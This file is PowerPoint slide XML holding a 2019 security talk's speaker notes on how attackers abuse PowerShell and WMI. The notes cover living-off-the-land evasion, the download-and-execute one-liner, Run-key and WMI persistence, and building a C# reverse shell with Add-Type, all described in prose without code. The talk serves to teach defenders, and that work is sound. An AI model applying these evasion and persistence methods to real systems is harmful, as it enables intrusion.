              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has this amazing cmdlet called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Add-Type. So I can store my C# reverse shell code in a variable and then provide this variable as an argument to this cmdlet and tell it to compile it to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Csharp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> binary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Now I did that just for educational purposes and highlight another powerful feature of PS but you can get creative with WMI eventing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA"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B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3479397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43F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8944369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is logically divided into 4 parts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first part involves a high level overview and background of this Topic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The seconds part would be a discussion about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which is followed by third part involving discussion on WMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Lastly I will share some recommendations, resources and open the floor for Question and Answers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now I have demos, however live demos never work so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> decided to record the demos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So lets get going. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2730701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going here I want to clear something up. There is nothing malicious about PowerShell and WMI. These are two very powerful technologies which the bad actors have learned to use against our system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However these are not the only system tools being abused by bad actors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In fact a term has been coined for this behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s called Living of the Land techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LOL involve using system tools, technologies against the system itself. Couple of example of system tools other than PS and WMI which are used for malicious purpose are Windows Registry and RegSvr32. We will talk more about the registry during this talk. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However if you want to learn more about Living of the Land Technique, Symantec published a paper back in 2017 on this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The motivation on using system tools is to make attribution harder. If you don’t know what attribution means, it’s means identifying the actors behind an attack. researchers study malware and based on metadata and coding style they can identify the group behind the attack. However if you use system tools it becomes harder since you don’t have an actual malware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also if you are using system tools for malicious purpose your Anti Virus is not going to flag them as malicious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lastly and the reason why I include this is because some vendors selling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blinky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> boxes might say that their next gen product uses AI and blockchain to detect malicious behavior to some extent it might but we all know its really BS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1055209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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a command line shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some people like to think of it as an upgrade to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, to some extent they are right but its not the reason why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell is built on top of .NET Framework,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> introduced the concept of cmdlets, you can think of them as commands but PS like to call them cmdlets. Cmdlets are functions which are built for specific jobs. For example Get-Process will return list of running processed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> so unique and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>beautifull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is that instead of giving you a textual output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> outputs objects. You get the impression that you are getting txt output but you are getting back objects. Which makes it very easy to tie together different cmdlets in a pipeline and do amazing things. If you are coming from Linux world a pipeline passes txt however PS passes objects. So you really don’t need things like grep etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JSnower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> talk on Pipeline. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the other advantages of using PS is that it make it very easy to interact with WIN32 API and to interact with .NET framework. You really don’t need to be programmer to take advantage of WIN32 API or .NET Framework.  This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> gold mine for bad actors </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad Actors loves this so much so that next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2458574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this chart which was published by Threat Detection Report from Red Canary First Edition 2019. PowerShell is the number one choice of Bad Actors. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1570838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anyone guess what is the number one liner which appear on almost 99% of the attacks which involve PS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the most used one liner by bad actors. Essentially this is the first stage of an attack where the bad actors download the payload for the next stage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now as you can see, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> provide you with switches which let you bypass script execution policies and keep the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> window hidden and non interactive. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next is the famous IEX cmdlet. You can supply a string of command to this cmdlet and it will execute it for you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next is the Method to download string provided by the .NET Framework. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So essentially the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interact with the  .NET framework to help us download our next stage payload and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses IEX cmdlet to execute that payload. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42559461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that’s not the only reason why bad actors uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. PowerShell also make it very easy to maintain persistence. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not only persistence but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> persistence, but what exactly is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> persistence? It’s using system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>componenets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to maintain a foothold after initial compromise. Bad Actors want to make sure that even after you reboot the system connects back to them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two methods commonly abused by attackers are Win Registry and WMI. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We are going to look first at Windows Registry.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3230984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Windows Registry has a special registry key called Run. If you insert the path on an executable at this key location the system will execute it the next time it reboots. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now its nothing new that this Key is abused by Malware however in 2014 a Malware with the name of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PoweLiks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, decided to take it to the next level. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of abusing this key to execute a malicious executable they simply used a System binary to execute malware which was stored at another key location. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When I read about the inner workings on this malware it gave me an idea to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for the same purpose. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4234114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we are going to shift our attention to Windows Management Instrumentation or WMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI is Microsoft implementation of Common Information Model or CMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CMI is a global standard which is being used to represent system information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI Organized system information in a hierarchical manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At the top is Namespace and then Classes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The information about a system is represented as an instance of these classes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you don’t know what class is then think of it as a framework which contain variables and functions. An instance is like a real world representation of this class, which has these variables and functions available for its own use. A class can have multiple instance and each will have its own copy of variable and functions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lets take an example: Here we have a WIN32_tapedrive class. Question on my laptop do you think this class would have an instance? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lets take Another example: Here we have win32_process class. Question do you think this class would have an instance on my laptop? Yes and not only 1 instance but multiple since there are multiple processes running on a system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24532517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08A991AF-C56A-D143-B020-9BBD6719E417}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1876424" y="5410201"/>
            <a:ext cx="5124886" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</a:t>
            </a:r>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21425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6B2CF2-D31E-7B48-9E3F-196D968B43C3}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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15328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38E805-8F7F-144F-953A-8FDCCAE0025D}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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542454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7AE2BF-FFF0-8640-8403-1E8F48B3430D}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
